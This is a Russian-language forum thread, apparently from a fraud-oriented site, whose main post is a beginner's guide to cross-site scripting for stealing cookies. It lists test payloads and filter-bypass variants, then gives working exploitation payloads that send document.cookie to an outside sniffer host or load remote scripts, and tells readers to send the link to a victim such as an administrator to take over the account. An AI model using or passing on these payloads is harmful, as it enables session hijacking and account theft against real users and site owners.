• Администрация не несет никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещенная к распространению, просим незамедлительно сообщить Администрации. Abuse email: abuse@darkwebs.ws

XSS для чайников / Воруем куки

Zerat

новичок

Zerat

новичок
Статус
Offline
Регистрация
02.04.2016
Сообщения
11
Время онлайн
0
Репутация
24
Так как мы новички будем разделять XSS на 2 типа ( на самом деле их больше )
Пассивная – если нам удалось исполнить скрипт без внедрения в сайт
Пример
Код:
 www.site.com/catalog.php?CatalogID=»><script>alert(“hello”)</script>
Вы заходите на данную ссылку и вам выдает алерт – это пассивная Xss

Активная – если вам удалось внедрить скрипт в сам сайт
Пример вы заходите
Код:
 www.site.com/catalog.php?CatalogID=1
пишите в комментарии
Код:
“><script>alert(“hello world”)</script>
обновляете страницу и каждый раз вам выдает алерт – это активная Xss

Понять если на сайте данный косяк или нет можно самым распространенным багом тупо вбивая в каждую форму и параметр “><script>alert(“Привет земляне”)</script> или же если нет фильтра вообще, просто <script>alert(“привет земляне”)</script>
Если нам выдает алерт радуемся,значит есть бага.

Фильтры:
Проверка фильтра
Вбиваем в любое место сайта вот такую вот конструкцию
–{}\/”’-proverka<script>?,
и смотрим HTML страницы ищем слово проверка и смотрим что скушал фильтр если он скушал <script> полностью меняем слово скрипт на любое другое возможно фильтр настроен именно на это слово

начинаем мучать фильтр

Код:
“><script>alert()</script>
<sc<script>alert()</script>
><script>alert()</script
<img src=”javascript:alert();
[img]www.site.com lowsrc=javascript:alert()[/img]
не скушал? Кодируем во все что только можно!
в гугле можно найти Xss encoder вбиваем наш скриптик и достаем закодированный вариант (если есть ограничение символов кодируем только то что скушал фильтр
но зачем нам эти алерты? Только для теста !

Эксплуатация:
Нашли дырочку? Надо бы её заюзать! Заходим в гугл и пишем online cookie sniffer

А вот пример рабочей пасивной xss
Код:
<script>img = new Image(); img.src = "www.site.com /sniffer/images/hophey.gif?"+document.cookie;</script>
http://www.site.com/download.php?id=1’><script src=http://site.com/sniffer/js/123.js></script>
http://site.ru/free?p='><script src=http://site.ru/script/123.js></script>
http://site.ru/free?p=’><script>img = new Image(); img.src = "http://hacker-lab.com/sniffer/images/123.gif?"+document.cookie;</script>
А еще можно делать это и без ссылок
Кидаем в комментарии
Код:
<img src="http://site.ru/sniffer/images/123.gif" border="0" alt="">
И вызываем прямо из картинки !

кидаем эту ссылку жертве(админу юзеру) получаем куки на сниффер подменяем свои куки на чужие вот мы в аккаунте !
Спасибо за прочтение данной статьи,задавайте вопросы отвечу на что смогу

P.S Статья не моя
 

Yoishi Roxige

участник

Yoishi Roxige

участник
Статус
Offline
Регистрация
14.03.2016
Сообщения
62
Время онлайн
0
Репутация
36
Эх,жаль что я слишком тупой,чтобы это понять.
 

Zerat

новичок

Zerat

новичок
Статус
Offline
Регистрация
02.04.2016
Сообщения
11
Время онлайн
0
Репутация
24

О нас

  • DarkWebs.ws — форум, посвященный вопросам заработка в интернете, различные схемы мошенников, IT вопросам и многое другое. Это форум о заработке в сети интернет.

ОТВЕТСТВЕННОСТЬ

  • Администрация не несет никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещенная к распространению, просим незамедлительно сообщить Администрации.

    Abuse email: abuse@darkwebs.ws

  • Партнеры

    • Яндекс.Метрика